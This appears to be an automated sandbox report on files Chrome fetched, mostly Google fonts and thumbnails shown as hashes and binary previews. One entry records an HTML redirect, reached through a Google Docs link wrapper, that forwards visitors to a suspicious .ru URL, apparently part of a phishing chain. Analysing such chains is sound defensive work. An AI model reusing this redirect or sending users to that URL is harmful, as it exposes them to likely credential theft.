                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 142920, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):142920
                                                                                                                                                                                                                                        Entropy (8bit):7.998331954193963
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:3072:wQumXsnnqTz5xa0PfTg2r1coEUOUKO+rE/FYSgEpF4XONoe:wQOU5xRhroqCrE/FHgEQ+Ke
                                                                                                                                                                                                                                        MD5:643086F598435216DC497F1FE1174F85
                                                                                                                                                                                                                                        SHA1:FD3050CC2BFCB38D36876B66CAA15D97AD3098BE
                                                                                                                                                                                                                                        SHA-256:15FCE9FC686A7ED24AE85F394838CCA6DC46CA2AA43DF5E35A9EDCD3EAF3577F
                                                                                                                                                                                                                                        SHA-512:CC899A561B18A00EBD949238CCEEFB78EBB0D7F61579C20DE1EBC6AD1273D6C393E3CB7DF0A41A8DEEE3B30EC9325F3443C5A760ED9C9BEC93BBE5E185A6C68A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/ebgaramond/v30/SlGDmQSNjdsmc35JDF1K5E55YMjF_7DPuGi-DPNUBg.woff2
                                                                                                                                                                                                                                        Preview:wOF2.......H.........-...........................>......P.`?STATD...B.....$........6.$.... ..P...J..[2..^y..>_..h|..m.L..M.`...n.Yy<Oc.......<7.c.c...........!......{0R............F...m6.~...p..H.C....P....%Qaj.Y.4....rV.........K)..v].....pF5.l0lJ*.F.i`.$KED.......j..'o.s.xi-...u.Z..L..Y...%r.H.E.*....(....+..+.LT....@.(..@..Z&$../.....v.e...2.5R.;.JK$&)-.}{s.;.....?.3.6........Z..\.....O.C....,.z..|...-.#.R._ZJ..<;0..C.\.p.F..k.r.....Uj..?..k.."0?.~...`F.^(.k.[...oP$.6~.5.Ya.....(.o.N/..<..5......s=.*.r...xa.8G.Wg...Zeb.Z...w.;..D....~."5..-l...0.z.F.,p...h........P$^..s.,.=..M?x.|.[..[...0.s...Q..x._.Tl..Ej...S.......%I.,>.H....&.g<......Q?..I..W..O5.M|.7.)\. .$..*.......J...O........_..>..;.....y.\t_....Zk...t.....2.....O....[...._(q.'..|..Kt{....#g.....[.$.!e........~.....KOC..\...."........~..<I.Z.|i...D.X........f.>....3..>.O./...n.;..)T....].-...b.......0k..b:....x.+.....k.U.f..".....U.+.........J..g.3.f9EtETZ.4q../....g.!.....][.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):67347
                                                                                                                                                                                                                                        Entropy (8bit):7.991601773885828
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:YPBq40FDaSMUwwxJjUE05wdiBVTpMJk0FUPw8CKZff4Ax5uF:0Bq40FZbfS6iBv90FL8XZff4Axo
                                                                                                                                                                                                                                        MD5:19350EC12112FFC74E634B7EF74103C8
                                                                                                                                                                                                                                        SHA1:090B48536A6A4375411B72FC606D4E82FCB76FBE
                                                                                                                                                                                                                                        SHA-256:FAFE2B8D1384FD725C9E71F900ECEE851E66EE91224984416956B7CA7A58FAD4
                                                                                                                                                                                                                                        SHA-512:A8217438E17A1030566EE6848A6D9FC2F15BD025C4C5C9BBA4624EAE2F2613BA360CDC56F5A92CF353DB924D1F7538CCA7BC4496581B34EECC571C7D0846212C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(....IDATx..............D..x......P..a....o%..!...N\....a...`X.a....a...`X......a...`X...`X.a....a...`X..=.dm.fY.?[.e...NQ.UU....}..9..K.$..q\.5..N.VY../...y.vXy.7M....7....4..i....{H....a....f.. ...0.O(QJ.!E.. BA$@. @*...(@!.@$..JB%.H@... ...*...<..;GwN....2...7...=..J$.....,.....%....f..j6...y ..gx.B...%\,.@Q.....E.z.f.1B.w...(.}ZB.Ap:....B.r..:..~.....f3...?E...^.g..."..x<X<.Vb...C..`0`W....u%........'..t......h.z=`.Z..L......Z .Z-.H..\...t4.M,.3..r.....o.g..i.\^....V..d2 ..a..zr...a:.~....v.J%......x...)...;!..DL&.V..^..R.J...r..v;lK..*N.=...`..p..j<...@Q.%d.v.F....R).J%.I....#+.."..h4j0.>C...~..FX.....T*@.n.......L$..R.mR..Xp....a...d2Q*.@.z..;O.C...p.....1.AQ...b2.e....RVeT.......,f.,&....e.0(...?..s.r...t...u^....5b.. ..jU^...z=nS.Uq.^.[ .@..6..oC,..\....E....q.^...._.J...q....D.Q$.W%N.e.r...y.........[.x.....~.......x<....M,..a}"1....V.).z..)..g2..R+.jE.L&.3.R+.2;.F1..)......z4.Q{..a.5...N\.X.`QWbU.5... ..X,..n.T.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):15344
                                                                                                                                                                                                                                        Entropy (8bit):7.984625225844861
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:ctE5KIuhGO+DSdXwye6i9Xm81v4vMHCbppV0pr3Ll9/w:cqrVO++tw/9CICFbQLlxw
                                                                                                                                                                                                                                        MD5:5D4AEB4E5F5EF754E307D7FFAEF688BD
                                                                                                                                                                                                                                        SHA1:06DB651CDF354C64A7383EA9C77024EF4FB4CEF8
                                                                                                                                                                                                                                        SHA-256:3E253B66056519AA065B00A453BAC37AC5ED8F3E6FE7B542E93A9DCDCC11D0BC
                                                                                                                                                                                                                                        SHA-512:7EB7C301DF79D35A6A521FAE9D3DCCC0A695D3480B4D34C7D262DD0C67ABEC8437ED40E2920625E98AAEAFBA1D908DEC69C3B07494EC7C29307DE49E91C2EF48
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                                                                                                                                                                                                        Preview:wOF2......;........H..;..........................d..@..J.`..L.T..<.....x.....^...x.6.$..6. ..t. ..I.h|.l....A....b6........(......@e.]...*:..-.0..r.)..hS..h...N.).D.........b.].......^..t?.m{...."84...9......c...?..r3o....}...S]....zbO.../z..{.....~cc....I...#.G.D....#*e.A..b...b`a5P.4........M....v4..fI#X.z,.,...=avy..F.a.\9.P|.[....r.Q@M.I.._.9..V..Q..]......[ {u..L@...]..K......]C....l$.Z.Z...Zs.4........ x.........F.?.7N..].|.wb\....Z{1L#..t....0.dM...$JV...{..oX...i....6.v.~......)|.TtAP&).KQ.]y........'...:.d..+..d..."C.h..p.2.M..e,.*UP..@.q..7..D.@...,......B.n. r&.......F!.....\...;R.?-.i...,7..cb../I...Eg...!X.)5.Aj7...Ok..l7.j.A@B`".}.w.m..R.9..T.X.X.d....S..`XI..1... .$C.H.,.\. ..A(.AZ.................`Wr.0]y..-..K.1.............1.tBs..n.0...9.F[b.3x...*$....T..PM.Z-.N.rS?I.<8eR'.3..27..?;..OLf*.Rj.@.o.W...........j~ATA....vX.N:.3dM.r.)Q.B...4i.f..K.l..s....e.U.2...k..a.GO.}..../.'..%$..ed.*.'..qP....M..j....../.z&.=...q<....-..?.A.%..K..
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):21008
                                                                                                                                                                                                                                        Entropy (8bit):7.953011335672351
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:oiO37z7Ie18Qk9X3MtEMyn9cedbAHMZJqltdb1yEJF0Xo2Ff9i8ZLUwY+YBW8LWL:w7oeEnXB9cuUHMZJqjdRyEJGXZFfwiYE
                                                                                                                                                                                                                                        MD5:00520086DDA41BC475DE2D9E8F647476
                                                                                                                                                                                                                                        SHA1:C1180F115D826048BF2ADD10D6DC5398FA470C7E
                                                                                                                                                                                                                                        SHA-256:EFA336B36BD206F00DD56A33DF59ECACBCC14321156B226D3BFEDB7AEF0C3ABD
                                                                                                                                                                                                                                        SHA-512:207C08EEB8FD431A3D3EF94A61345CFDBB8BDBF4423BF6670A90197A5540E7CBE42F736D188063CD88BC79AAFA6D60EE30301A3DC71001FBC96AFE8F71BCB8EA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..Q.IDATx......... .?....B.........@X..... ,.a........a...@X..... ..$.....k.<..q..r.Op..3...Z..m.....\%.....v.j^.{._..o...Z..+5..e.X.Rk.......yE.e...j.9.".....P.:.....^*..,.,..uz`wwwcc.{.mooWUU.s-..&..!.../,-.,.-.a..g.cb....X..M.S.#c.G.e.;.TTT7.X....8.......d.D........U*......q...tvv..f`hvv.......y.N.XJJ.<....f...`nn........@ ,,..Z...w...../.0......}jf>9./..Sx...;3.......?.LY....k.."y.......2.....===999...<...........H&++.x.........R.....#...z..........b................[....j.f{W....Z<_.y..X....nl....V..%&.Z.:j...vD?...........)...n......#. t+......411..X`.F.a...+.. .....P..H....V&.....d.....a93.z<.....=nT..!..b..P........d........%42...v.7.,.***..7o./...2z..U||.H$.p80..<.7t".. .._...*...B.A...........}.....TPPP[[.....GFBH...48.z......>|.4..O...'FD.w.$c.S.SlnTXx$...|1$F.8<.07...-...6....%DK...(|=z..."..h.g..3...0.M...C...1.......B ..`)W....B..........#..'.......p.B.N.OyY...=.NC....'.@.^m2.v..V.{.......j....`... X......`... X
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 64792, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):64792
                                                                                                                                                                                                                                        Entropy (8bit):7.995965227051492
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:uRjIIKORzkuW28lGsIUfTeeeR7HJ6tUf3:mI+wxvSDYqv
                                                                                                                                                                                                                                        MD5:4569BAFE1E55623A7464FD97303E5FDD
                                                                                                                                                                                                                                        SHA1:9A07C20C972FA29FCFED89DB7C09212B9B40F813
                                                                                                                                                                                                                                        SHA-256:1B3BF848AA10D3D17F6598C2AD844F11716B2090916759C4509393A1277DFE56
                                                                                                                                                                                                                                        SHA-512:A278080232FA696F9511F0E2F5864BF068E16BDBFC388CF84D53794696568995606AE2806D167F1F65F96399F257C15CF79276F934AA5B1E3F20E437684305B2
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/montserrat/v29/JTUFjIg1_i6t8kCHKm459Wx7xQYXK0vOoz6jq6R9aXo.woff2
                                                                                                                                                                                                                                        Preview:wOF2...............T..................................j..<.`?STATD..l..............2..n..6.$..X. ..>..h...[.....d..i.[..(..abv.hq.4o.....\+.u.M~.0........g..:..........I..w8..zo21..YJ.j..[@D.....U..I).E.b..4...B...VM.4P.\|-.{Imo..F....#N....g.B.TI.tnZ4..!..q.. G..$<,..{...QT....#..sHm....y.r...tIHU.."b..O!..Kmh.b}~.u.......zeqTo1.)_g......z..._.y~....?...>.J..J..Q9....!...{.l\.q.V...^.,.4./..-nj.aj....1V+..D.t&...t74J.......V...........^.!(..8hA;}_K.^...\.%.pSI.*..C..*Si........Ggae...Q+.L%%.<..@..!..q.A.....&L..)tl..>..'N.....n.R7.4So...IS~.X..,&y?!`._.>.....o...P...[./...._X.Y...*#......{...b.h".!JL...../.D.*.....S..;..kk....e..."D..%.J.(..;..j..BJ=.;9......`n..!1r..H.0..`.l,..L%J*.JR..`..JX..2..fb.kc.c..Mg.hES..&m..\....S....H[(.e.6....L....g..1Q&......#.wR...DI.'*......?.(...=.v..g..|dj........Z.k..=.....a........02....N.k.r....p..w).......2D3..U.B".H.?.S...-z.:...(Km\r2N.......].....W..wb.(M.S...,X.w......g;q...J>.........R K........
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 144 x 144, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):479
                                                                                                                                                                                                                                        Entropy (8bit):6.907722555270069
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:6v/70f7XnKN+URXKLaFR4N8iY6w8IzuiWOZBy5VaJxSeHNRPXyF:9fTKpXKceN8iYeeZ85CSef/e
                                                                                                                                                                                                                                        MD5:EBEE417C131CC534EBE8F665BD588936
                                                                                                                                                                                                                                        SHA1:2EBD6063F631D8E596858CCBD2A545F7E6061DB8
                                                                                                                                                                                                                                        SHA-256:80C3885811A42DA7C6E7B9B811800AF8105E8F310C7ABDD59BF93AA8C4FBF769
                                                                                                                                                                                                                                        SHA-512:06F23550B06D2D49147DC770E0E66857C90FEC713D30F85C258A2ED12BBB13C9DB2D83C22F4A62460E991FEB008064B3886E2F19F9F3882DA115A21584D01F9A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/i/productlogos/docs_2020q4/v7/web-144dp/logo_docs_2020q4_color_1x_web_144dp.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR...................NPLTE...@..B..C..B..B...g.@..A...g.D..B..@..B..A..B..B........B..B..C..@..B..B..A....T....tRNS.8....o$..<.(.K.....W...S.:.....&IDATx......1..Q.(.|.7.....g*x?. .....U...|..-...:.P{.f....hH..X.K..\..A.E...\."H..@....D..&2....$.< E...".... ].......t.".t..RD~...A....E:H..A.H.)"?H.. A..i"?H..9@....... @?.:V..../...bS.......# @................./"... @...r... @.............].Z..].Z....il..u....GE.M.]EU.=-....v...q......=.*.-.[. .....IEND.B`.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (585)
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1140928
                                                                                                                                                                                                                                        Entropy (8bit):5.618204984805897
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:kT/8NDTAa686+3gd+/Ds5Qa7Kvu//ZUHlXLUtU:lNnAaB6+wdU8//ZKUtU
                                                                                                                                                                                                                                        MD5:B92782E114CD96DC86E31801B8690272
                                                                                                                                                                                                                                        SHA1:B7FF37F085557B0A610A0A6A0DDD18B3551B73D1
                                                                                                                                                                                                                                        SHA-256:F0820478761D4269D33A57554AE7F14271C38425DDE771587CD35D66563F7EA2
                                                                                                                                                                                                                                        SHA-512:35EAB86251346D591811293A1E87B4F4676FD721DD9C25FEFC09777C374BE9B1EEBD69B2C146CC409B2E406EAD67CD5A2023CAD7710AC39A40B3CA8234046CD1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:mK(L1a);./*.. Copyright 2016 Google Inc... Permission is hereby granted, free of charge, to any person obtaining a copy. of this software and associated documentation files (the "Software"), to deal. in the Software without restriction, including without limitation the rights. to use, copy, modify, merge, publish, distribute, sublicense, and/or sell. copies of the Software, and to permit persons to whom the Software is. furnished to do so, subject to the following conditions:.. The above copyright notice and this permission notice shall be included in. all copies or substantial portions of the Software... THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR. IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,. FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE. AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER. LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,. OUT OF OR
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):72512
                                                                                                                                                                                                                                        Entropy (8bit):7.986446469734756
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:cFaYTw01F4sMtpDxTOU3Aa8wBiyDYxsCKs4vCHtWW+Esj7FEX8Y:cFaYT51FotpoU3Aa8wBbXCHQCdyj7eN
                                                                                                                                                                                                                                        MD5:34D92FC87C795F5AA8B6B212E497FF05
                                                                                                                                                                                                                                        SHA1:DC8E9D0292C0215936A04E7862EA1F42FF567F43
                                                                                                                                                                                                                                        SHA-256:18B54FFAAB536AC32E4ADC81C0D445FE94ED58C17305512DB86A024312BD7786
                                                                                                                                                                                                                                        SHA-512:2FFB12AE71B6748620D7C556F5F0F046E825496C5290BB72DEEA90E252286D8580B42C3408C218B3C3BCF56CB34BA543771798A085A64B8725589A7FDB280834
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(....IDATx......... ...9>!.)..).......`+,.a...U...C..L.x..........b>.N|...(...mg&..i.F....TE.c'.g.I...D{:N0Q.?.b[....".]..{.23..0....9.;.N....J).Bk]s!"..lR....2Z....n..V.;Zhl..C..J,.r*...._..-..$-.K*T.......H.....i.%............{.or.&8(..(...e.....b.,*pTQR.L&.....gv...}dJ.........n.n...1...52....0......pW.c@,:....)y.">.HA...S.Q7n.....i".A..x....A..0.Me..%.B;*.-m.Ck...y)..........B..,E.:!.......>.b...c..fR...X,F.<.e.a.m... ..i.wm..QM`....0.TT..".%...@3.$.i.3.#.F.......kA.zhl..|.y...<..).|....D*..U...m...g..<[...jYmm...gS.Qq'.Jb.n3.E:....}....,M.....y/.....x\......a%P)..\=..I.v..........dG..[..*....;PB.y..X.,...4.....T..uy.d..w;...Ue>.....Y..F..m"y.+..t.0R...@$.34....&.U...k....._..>....c.K.m.\"G&..E.F.M.#:&..[. .;.B. &c.R........0F....`..T.....C.r....`JvV.....I.a....e..,.+[n.6.WG......].....!6J......*%L.\...w.r.Bw......^E..#..(+.$...>.../TD...Ze.BU!.R.U.Y.-,....!K..j..........Ua.(yug."b...../.x..J..M.d.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):352
                                                                                                                                                                                                                                        Entropy (8bit):5.346029453395677
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:wBzkrQWR0iYBtqW3kUWPq2JlKIOPMhpTNyk7uRTMhpTNl71QrizYPMhpTNGP:4krY1trWPqf7Mh9OTMh9BQrpPMh9G
                                                                                                                                                                                                                                        MD5:0D450630746D59CDC2B67C61924BA227
                                                                                                                                                                                                                                        SHA1:29A6C52381FC5BAB9C6B5C7A6D6F1208329A3BF6
                                                                                                                                                                                                                                        SHA-256:F197FB989A0D778484B40423BF0B4DD7D985AA33BA42F6A58769A5200861D385
                                                                                                                                                                                                                                        SHA-512:4943886F73B67AAA19AD84F3D58E1F3690525B4F6ED3A8A6E7A35EB155159362E76CD0652405CA5F3BBA19725F0EBE5D2A3BD6110684622D039B6029776041E3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://www.google.com/url?q=https://2ya.leyapham.ru/zdvftqs/&sa=D&source=docs&ust=1741178860062685&usg=AOvVaw0m1sYpk_bTclst7lglGFek
                                                                                                                                                                                                                                        Preview:<HTML><HEAD>.<meta http-equiv="content-type" content="text/html;charset=utf-8">.<TITLE>Redirecting</TITLE>.<META HTTP-EQUIV="refresh" content="1; url=https://2ya.leyapham.ru/zdvftqs/">.</HEAD>.<BODY onLoad="location.replace('https://2ya.leyapham.ru/zdvftqs/'+document.location.hash)">.Redirecting you to https://2ya.leyapham.ru/zdvftqs/</BODY></HTML>..
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 129848, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):129848
                                                                                                                                                                                                                                        Entropy (8bit):7.998140890095368
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:3072:5Pxah+PkeDK1M6rUtoWrUzhK3gBMNopGuvUpRx1sH:1gh+EM6omeWhKvNop9yRx16
                                                                                                                                                                                                                                        MD5:07987CC4A39B31CF6AFFFDE675F1D849
                                                                                                                                                                                                                                        SHA1:7ADA46987D0E1AAE2D3288272F8C97AABA4792E5
                                                                                                                                                                                                                                        SHA-256:DAE2E505F61E23A088E4FB91523643D2E0B816F29DB2BD57AFB3F56F00D080F3
                                                                                                                                                                                                                                        SHA-512:7AACFB569ADCA23716E0E3CA1D81073126DAFCAEFC33F4F43261A60F3F30BDF6FE0F1303BC8F038A2E55C574F6B59EBA85E7997F2A457B7E8D42D9ECA798FFEB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/ebgaramond/v30/SlGFmQSNjdsmc35JDF1K5GRwUjcdlttVFm-rI7dbR49_.woff2
                                                                                                                                                                                                                                        Preview:wOF2.......8.........................................8....`?STAT@.........|.....P..6.$..L. ..v...n..[S...Sd{.....n.i.ID.D4..C.w..(I....1.`...\O]G.Z....z..I@.m.....1...........[X..n..&..W....4A...w.+..0..N.>...d!..;..^v|S..z}..`(..h,.p.SN.(...1.q..5..sx8....X.r.C.!V.j......m..9.*...Q5&>..j#hZ.Z.1.i.I2.{..>....S'Q...h'..f:S./)....Onx.#b.....0g.....0.`(...X....x..%'........s.F...........pp.]/.PU!4..A|/.t7a,.|b..^b ?.]......J.x}.............)o........2...,o..0q.T...>q..y0..*f.f.0.`.m..dCC.6A.{.;...bI....5..q.....-&.4.....7.8.4..q....4..is..q.1.z}...[....&....*..L...'..EP......B.^...~:.d.....vw7k....J....U.).4*.F%\..0.......{..<.7.]..|....2.Ko.<.}.g...".^..{.=...y......U?.?.(c.wX ...J..J..%...(p..3g.e'.^.!d.\aU......C..t.}...T.o.......X..0..Q.....*..li*.R..E-.....f..e....:(...?@........>v.K. 7.]'.Z..5cV.k.#.<48......nXx.....w...bS">....../[.g..p.I..?UR5..k<.wc..G.2.......^..'3...E....fDU..;.f..-....S..?/...1.....T....kM4.......>g.L3..CT[.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 47364, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):47364
                                                                                                                                                                                                                                        Entropy (8bit):7.9944232758512355
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:768:JXGmLkG8r2AzLYjh8URHJeHx85z4+Qn3BofJVBDwt6M//67Yxb3ds:AqkZ2AYzcxU41nRofJVBa66/6mbNs
                                                                                                                                                                                                                                        MD5:FCC676E93787A8D472AD00BF7F158D88
                                                                                                                                                                                                                                        SHA1:A28C8050BAA6E17C6ADEC60BCA582715403D500B
                                                                                                                                                                                                                                        SHA-256:1F6B8D8F7D462DC42D48B29E68062A707890AA2DD700C947806949F63D79694A
                                                                                                                                                                                                                                        SHA-512:887F1B666623249B995BF78562F87410D295619967C5146DBB5EFA01D6FA7C135D51D68F6A4C0A80A5B1EE1C0734713F6CA03605D2104BBA3AB991BC202AD3E6
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/lora/v35/0QI6MX1D_JOuGQbT0gvTJPa787z5vCJD.woff2
                                                                                                                                                                                                                                        Preview:wOF2...............$..................................f..l.`?STATD........D..K..t..6.$..d. ..P.....["...q.......d..s..?......<.Vv.j....S,a7..t..%j^.*.....M.....m7.D.)C.o..7..)4.yF..mW.&v..Y..#s...1j.!..TG.{&O....P....-......Fq...D.......SQ.:^.P..P@.}...L..B...1!BN.<.....0_K....).U....}6..i.....eU.\3...WQ(c...m.Z.&.h.a.%.R..*....E..E.T2.T.&|.uu..6m....R}t......]......x..8...*.}.....Kl..W]....<Y.....W&..]...w......^tU......s...S.g}......w.b........N11rQ.Q[cms.j..2u.....Jrf..%i......M.F.....S.*.....bD`......t.h.l.....Z....@....d....9s.u!#)..hSa.X.....DVl...|.....8.1N.fj...@........w.7.*M.g.....0*...7...T}.e.K..lod.y.e...*P.r.j..@.%T..@....r{W..]..z........E....z.6...Vd........R0.@%rX.D.2.@.......g .....K#...\.D5.Mh.....h...p..!...=....r..8.!pv..V..X6.Lm.....H..tJ"TJ$..{h.t..I...o...Z.4.x..(...E=.H4.C$T.].x..U.w..eW40...h.........K.._.jy."..K[...K...5?.S.=..yVs.P8j....y.......%..h~g~%..(.V..(/S6..9....2...fr?V..Z.j..X..z*Y~...*... i,. .O.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):16379
                                                                                                                                                                                                                                        Entropy (8bit):7.946086064277391
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Agyj8C8qZnntrq7LhmmCcVb6GimVcmC7tBC:+/qHZCQOGumC7tQ
                                                                                                                                                                                                                                        MD5:E2A4454402E767F3E8A64D83581FA0F8
                                                                                                                                                                                                                                        SHA1:C2C0A2FEEEAFB66E1FF649CB397100C888E342D8
                                                                                                                                                                                                                                        SHA-256:F4D4ABD55A4D3980C900AEE116BC89D7D5D10E44E6FB16FD04F0BA6C2100FA0B
                                                                                                                                                                                                                                        SHA-512:2C71312C91E156A6ECC463F18248C8BA24B7891117A749B353A35F525BA8B30575EDA1AD200262087BB19AC3801754BB2E87D238F860BC3249CE231EF51DF664
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/12LBFX3M9Z5LenKxuaC-Ig9OPxuucdAvXyOIIo4sQklU_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..?.IDATx...1.....0.K...[.E.,!,@X..... ,.a....V....a............@X..... ,.a........a...@X..... ,@X..... ,.a............@X..... ,@X..b...h.0..<..k.m.m.m..o.3.iz....}o.....I.....t.....W.%..9..8m.t4...(..i......Y.#.X..`9r.....,.X..[1..~..........`.....Um...[,.?|..??..^~.'O..K-[..E..Y.gE*W..Z5^.|..{w....-..J....?w...WW.K..,.C.5....o.1{...kf.....Vn....~...t....k4..%_....8S...d.y.......b6KO...F....._2.Z.r..#..=~.....H.a..0C....g..J}.....N.3...k.....{..J.../.K..uf.u...x..n.).c2D..<.kV..O..i....\.g...9.:s.l...4.[......M).Y.Z....T)....m..../.....\.r.......&..t....g......X....'...sg....&..GO.M.C.k....l!g.\.......v.L....X.p:.+_.....7..`.?y..l..f)=..0...E.ZL.........0..=.Ie....2.[wl..@..........V.Qm.`...5.%..`.V.W.".H..D../0lpK.....S'B........M...C..{...m...J..I...u...!...W....;.CDS.M..*]{w...'8A+...P.....KW,.r..<t...>.....i ?g..[p#.0.t.2..'.a..>..+d.4.<.\..ZV.....m..Y.........}....n ..3..3..d.69.%
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):75590
                                                                                                                                                                                                                                        Entropy (8bit):7.98843737585609
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:9HeDt4yMOxAAWK6IrCderXSrNQbN9BGh+X8fEv9:9H+TxAGDaeWrN+5e+++9
                                                                                                                                                                                                                                        MD5:252166C1202B3C942B6B3F26E594A79A
                                                                                                                                                                                                                                        SHA1:B71540AA2B6050DDD7693F0237CAC8008325C08E
                                                                                                                                                                                                                                        SHA-256:79DB9814D595FE5592D8184F57EC0B3476628CBBB7B5A549BA70FFA7B6F2F6FA
                                                                                                                                                                                                                                        SHA-512:8BA3289BD5963A3D21A8D9374C47B02F11486624FF01CB856290586141693166EFCA5D5FC52CCCB000E9CC1E6B49B315C9D4CD8D454626536EA17997F0F5A862
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
